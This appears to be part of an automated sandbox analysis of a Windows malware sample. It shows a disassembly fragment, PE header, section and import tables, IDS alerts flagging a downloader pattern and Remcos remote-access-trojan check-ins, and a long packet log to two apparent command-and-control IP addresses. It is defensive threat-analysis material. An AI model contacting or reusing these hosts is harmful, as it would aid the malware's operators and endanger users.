call eax |
mov esi, 004082B0h |
push esi |
call 00007F86EC522E8Fh |
push esi |
call dword ptr [00408150h] |
lea esi, dword ptr [esi+eax+01h] |
cmp byte ptr [esi], 00000000h |
jne 00007F86EC51FC3Ch |
push 0000000Ah |
call 00007F86EC522EE8h |
push 00000008h |
call 00007F86EC522EE1h |
push 00000006h |
mov dword ptr [00434EE4h], eax |
call 00007F86EC522ED5h |
cmp eax, ebx |
je 00007F86EC51FC61h |
push 0000001Eh |
call eax |
test eax, eax |
je 00007F86EC51FC59h |
or byte ptr [00434EEFh], 00000040h |
push ebp |
call dword ptr [00408044h] |
push ebx |
call dword ptr [004082A0h] |
mov dword ptr [00434FB8h], eax |
push ebx |
lea eax, dword ptr [esp+34h] |
push 000002B4h |
push eax |
push ebx |
push 0042B208h |
call dword ptr [00408188h] |
push 0040A2C8h |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8608 | 0xa0 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x52000 | 0x39180 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x6627 | 0x6800 | 8c030dfed318c62753a7b0d60218279b | False | 0.6642503004807693 | data | 6.452235553722483 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x8000 | 0x149a | 0x1600 | 966a3835fd2d9407261ae78460c26dcc | False | 0.43803267045454547 | data | 5.007075185851696 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xa000 | 0x2aff8 | 0x600 | 939516377e7577b622eb1ffdc4b5db4a | False | 0.517578125 | data | 4.03532418489749 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x35000 | 0x1d000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x52000 | 0x39180 | 0x39200 | 2b4e1d509c996fc0835cd264198de9c9 | False | 0.33165942970459517 | data | 3.439269253351708 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x524a8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.1941470483851887 |
RT_ICON | 0x62cd0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.21788942610889217 |
RT_ICON | 0x6c178 | 0x7da9 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9887780161024589 |
RT_ICON | 0x73f28 | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 26560 | English | United States | 0.22041353383458648 |
RT_ICON | 0x7a710 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.22504621072088724 |
RT_ICON | 0x7fb98 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.22815304676428907 |
RT_ICON | 0x83dc0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.24553941908713692 |
RT_ICON | 0x86368 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.26852720450281425 |
RT_ICON | 0x87410 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.4341684434968017 |
RT_ICON | 0x882b8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.29713114754098363 |
RT_ICON | 0x88c40 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.4453971119133574 |
RT_ICON | 0x894e8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.3824884792626728 |
RT_ICON | 0x89bb0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.24566473988439305 |
RT_ICON | 0x8a118 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.3421985815602837 |
RT_DIALOG | 0x8a580 | 0x144 | data | English | United States | 0.5216049382716049 |
RT_DIALOG | 0x8a6c8 | 0x100 | data | English | United States | 0.5234375 |
RT_DIALOG | 0x8a7c8 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0x8a8e8 | 0xc4 | data | English | United States | 0.5918367346938775 |
RT_DIALOG | 0x8a9b0 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x8aa10 | 0xca | data | English | United States | 0.6633663366336634 |
RT_VERSION | 0x8aae0 | 0x274 | data | English | United States | 0.5222929936305732 |
RT_MANIFEST | 0x8ad58 | 0x423 | XML 1.0 document, ASCII text, with very long lines (1059), with no line terminators | English | United States | 0.5127478753541076 |
DLL | Import |
---|---|
KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW |
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage |
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW |
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-06T11:47:04.196262+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.20 | 49768 | 85.120.16.93 | 443 | TCP |
2024-10-06T11:47:10.534594+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.11.20 | 49769 | 192.169.69.26 | 3980 | TCP |
2024-10-06T11:47:33.265040+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.11.20 | 49773 | 192.169.69.26 | 3980 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 6, 2024 11:47:03.316562891 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:03.316688061 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:03.317028999 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:03.342674017 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:03.342745066 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:03.758506060 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:03.758790016 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:03.788209915 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:03.788296938 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:03.789587975 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:03.789776087 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:03.791614056 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:03.832364082 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.196424961 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.196645021 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.196736097 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.196894884 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.398116112 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.398140907 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.398263931 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.398349047 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.398403883 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.398515940 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.398680925 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.399157047 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.399210930 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.399408102 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.399409056 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.399480104 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.399518967 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.399709940 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.600701094 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.600740910 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.600898027 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.600924969 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.600944042 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.601089001 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.601758003 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.601793051 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.601912022 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.601989985 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.602016926 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.602133036 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.602236032 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.603197098 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.603229046 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.603394032 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.603415966 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.603457928 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.603646040 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.801456928 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.801498890 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.801604033 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.801681042 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.801696062 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.801839113 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.802149057 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.802185059 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.802280903 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.802280903 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.802328110 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.802377939 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.802390099 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.802500963 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.802566051 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.802666903 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.802699089 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.802812099 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.802851915 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.802865982 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.802917004 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.803116083 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.803148985 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.803282022 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.803299904 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.803459883 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.803482056 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.803540945 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.803747892 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.803909063 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.803946018 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.804061890 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.804307938 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.804322958 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.804554939 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.843939066 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.843978882 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.844090939 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.844285965 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.844301939 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.844610929 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.002325058 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.002365112 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.002563000 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.002583981 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.002626896 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.002743959 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.002844095 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.002882957 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.002952099 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.003000021 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.003101110 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.003113031 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.003243923 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.003735065 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.003762007 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.003962040 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.004059076 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.004188061 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.004199982 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.004504919 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.004535913 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.004642010 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.004658937 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.004877090 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.004959106 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.004986048 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.005085945 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.005161047 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.005176067 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.005278111 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.005403996 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.005434990 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.005474091 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.005486012 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.005569935 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.005569935 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.005667925 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.005733967 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.005759954 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.005789042 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.005942106 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006031990 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006045103 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.006153107 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.006186008 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.006227970 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006242037 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.006304979 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006396055 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006505013 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.006530046 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.006551981 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006565094 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.006629944 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006629944 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006726980 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006726980 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006776094 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006882906 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.006915092 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.007020950 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.007241011 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.007253885 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.007388115 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.007412910 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.007422924 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.007436991 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.007591963 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.007657051 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.047252893 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.047283888 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.047388077 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.047489882 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.047502041 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.047586918 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.047736883 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.087357998 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.087428093 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.087564945 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.087728024 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.087771893 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.087910891 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.205553055 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.205673933 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.205785036 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.205785036 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.205950022 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.205950022 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.205950022 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.206037998 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
